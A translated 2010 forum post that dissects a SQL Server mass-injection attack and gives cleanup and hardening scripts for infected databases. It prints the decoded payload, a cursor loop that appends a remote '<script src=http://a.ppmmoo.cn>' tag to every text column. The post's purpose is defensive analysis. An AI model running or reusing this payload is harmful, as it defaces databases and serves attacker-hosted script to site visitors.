2010-4-10
By 饭
Mass injection through the database (挂马, planting malicious script across a site's content) has become one of the main ways of planting it. Webmasters have posted many different injection payloads online, most of them different in form but identical in intent, and there are mutated ones that go straight through a WAF, replaying the fierce back-and-forth between planting and counter-planting. ZZZzzz.... Calmly, then, the injected statement analyzed here is:
dEcLaRe @s vArChAr(8000) sEt @s= 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 eXeC(@s)--
It relies on dynamic execution. Decoding the hex in the statement above and tidying it up gives the following:
dEcLaRe @t vArChAr(255),@c vArChAr(255)  -- declare variables
dEcLaRe tAbLe_cursoR cUrSoR  -- cursor
FoR sElEcT a.nAmE,b.nAmE FrOm sYsObJeCtS a,sYsCoLuMnS b
wHeRe a.iD=b.iD AnD a.xTyPe='u' AnD (b.xTyPe=99 oR b.xTyPe=35 oR b.xTyPe=231 oR b.xTyPe=167)  -- walk every table and column
oPeN tAbLe_cursoR
fEtCh next FrOm tAbLe_cursoR iNtO @t,@c
while(@@fEtCh_status=0)  -- start
bEgIn
exec('UpDaTe ['+@t+'] sEt ['+@c+']=rtrim(convert(vArChAr,['+@c+']))+''</title>"><script src=http:// a.ppmmoo.cn ></script><!--''')  -- run the update
fEtCh next FrOm tAbLe_cursoR iNtO @t,@c  -- move the cursor to the next record
eNd  -- end
cLoSe tAbLe_cursoR
dEAlLoCaTe tAbLe_cursoR
In the syscolumns table, name is the column name and xtype is the data type; the xtype numbers map as follows:
xtype=99  ntext
xtype=35  text
xtype=231 nvarchar
xtype=167 varchar
What the statement does is walk every user-created table, pick out the columns of type ntext, text, nvarchar or varchar, bind them to the declared cursor, and then run an update through the cursor that appends the tag "<script src=http://a.ppmmoo.cn></script>" (wrapped in "</title>">" and "<!--", as the decoded code shows) to every value, completing the database-wide mass injection.
As shown in the figure:
Write a statement directly to strip the inserted script:
use tempdb;  -- the post runs this in tempdb; run it in the infected database instead
declare @t varchar(555),@c varchar(555),@inScript varchar(8000)
-- must be exactly the string the payload appended (see the decoded code above)
set @inScript='</title>"><script src=http://a.ppmmoo.cn></script><!--'
declare table_cursor cursor for
  select a.name,b.name from sysobjects a,syscolumns b
  where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)
open table_cursor
fetch next from table_cursor into @t,@c
while(@@fetch_status=0)
begin
  -- replace() cannot work on text/ntext directly, hence the cast
  exec('update ['+@t+'] set ['+@c+']=replace(cast(['+@c+'] as varchar(8000)),'''+@inScript+''','''')')
  fetch next from table_cursor into @t,@c
end
close table_cursor
deallocate table_cursor;
After the cleanup, the SELECT permission on the database objects sysobjects and syscolumns can be removed, to avoid having to repeat this labour. SSSsss...
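As an added example (not code from the original post), here is a defender's version of the same catalog walk described above: it first reports which text columns still carry the payload, then cleans only those without the truncation that the varchar(8000) cast in the cleanup statement introduces, and finally applies the permission change recommended above. It assumes SQL Server 2005 or later (nvarchar(max) and sp_executesql), that it runs inside the infected database, and that [webapp_user] is a placeholder for the site's database login; the marker string is the one decoded above, written without the spaces the post's rendering shows around the host name.

```sql
-- Added example, not from the original post. Assumes SQL Server 2005+,
-- run inside the infected database; [webapp_user] is a placeholder login name.
SET NOCOUNT ON;
SET XACT_ABORT ON;   -- any runtime error rolls the cleanup transaction back

DECLARE @marker nvarchar(200);
-- Exact string the payload appended (taken from the decoded code above).
SET @marker = N'</title>"><script src=http://a.ppmmoo.cn></script><!--';

DECLARE @t sysname, @c sysname, @sql nvarchar(max);

IF OBJECT_ID('tempdb..#hits') IS NOT NULL DROP TABLE #hits;
CREATE TABLE #hits (tbl sysname, col sysname, rows_hit int);

-- Step 1: dry run. The same catalog walk the payload used, but read-only:
-- count, per text column, how many rows still carry the marker.
DECLARE col_cursor CURSOR LOCAL FAST_FORWARD FOR
    SELECT a.name, b.name
    FROM sysobjects a JOIN syscolumns b ON a.id = b.id
    WHERE a.xtype = 'U'
      AND b.xtype IN (99, 35, 231, 167);   -- ntext, text, nvarchar, varchar

OPEN col_cursor;
FETCH NEXT FROM col_cursor INTO @t, @c;
WHILE @@FETCH_STATUS = 0
BEGIN
    -- QUOTENAME keeps a table or column name containing ']' from breaking the
    -- statement; the marker is passed as a parameter, never concatenated in.
    SET @sql = N'INSERT INTO #hits SELECT @t, @c, COUNT(*) FROM ' + QUOTENAME(@t)
             + N' WHERE CHARINDEX(@m, CAST(' + QUOTENAME(@c) + N' AS nvarchar(max))) > 0';
    EXEC sp_executesql @sql, N'@t sysname, @c sysname, @m nvarchar(200)', @t, @c, @marker;
    FETCH NEXT FROM col_cursor INTO @t, @c;
END
CLOSE col_cursor;
DEALLOCATE col_cursor;

-- Keep this result set: it is the record of what the cleanup will touch.
SELECT tbl, col, rows_hit FROM #hits WHERE rows_hit > 0 ORDER BY rows_hit DESC;

-- Step 2: cleanup, limited to the columns step 1 flagged. REPLACE cannot run on
-- text/ntext directly, so cast to nvarchar(max): a varchar(8000) cast silently
-- truncates longer values and loses non-ASCII characters in ntext/nvarchar.
BEGIN TRANSACTION;
DECLARE fix_cursor CURSOR LOCAL FAST_FORWARD FOR
    SELECT tbl, col FROM #hits WHERE rows_hit > 0;
OPEN fix_cursor;
FETCH NEXT FROM fix_cursor INTO @t, @c;
WHILE @@FETCH_STATUS = 0
BEGIN
    SET @sql = N'UPDATE ' + QUOTENAME(@t)
             + N' SET ' + QUOTENAME(@c) + N' = REPLACE(CAST(' + QUOTENAME(@c) + N' AS nvarchar(max)), @m, N'''')'
             + N' WHERE CHARINDEX(@m, CAST(' + QUOTENAME(@c) + N' AS nvarchar(max))) > 0';
    EXEC sp_executesql @sql, N'@m nvarchar(200)', @marker;
    FETCH NEXT FROM fix_cursor INTO @t, @c;
END
CLOSE fix_cursor;
DEALLOCATE fix_cursor;
COMMIT TRANSACTION;
DROP TABLE #hits;

-- Step 3: the post's hardening advice, applied to the application's login so the
-- catalog walk cannot be repeated through the site.
DENY SELECT ON sysobjects TO [webapp_user];
DENY SELECT ON syscolumns TO [webapp_user];
```

Run step 1 on its own first and keep the #hits output as the record of what was touched. CHARINDEX avoids the LIKE wildcards a payload string might contain, and QUOTENAME stops an odd table or column name from breaking the dynamic statement. Note that sys.columns and INFORMATION_SCHEMA.COLUMNS expose the same column names and types as syscolumns, so the DENY raises the cost of the automated walk rather than removing the information; the injection point itself still needs parameterized queries.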

Here to give this a bump, the legendary 饭总.
Heh, thanks!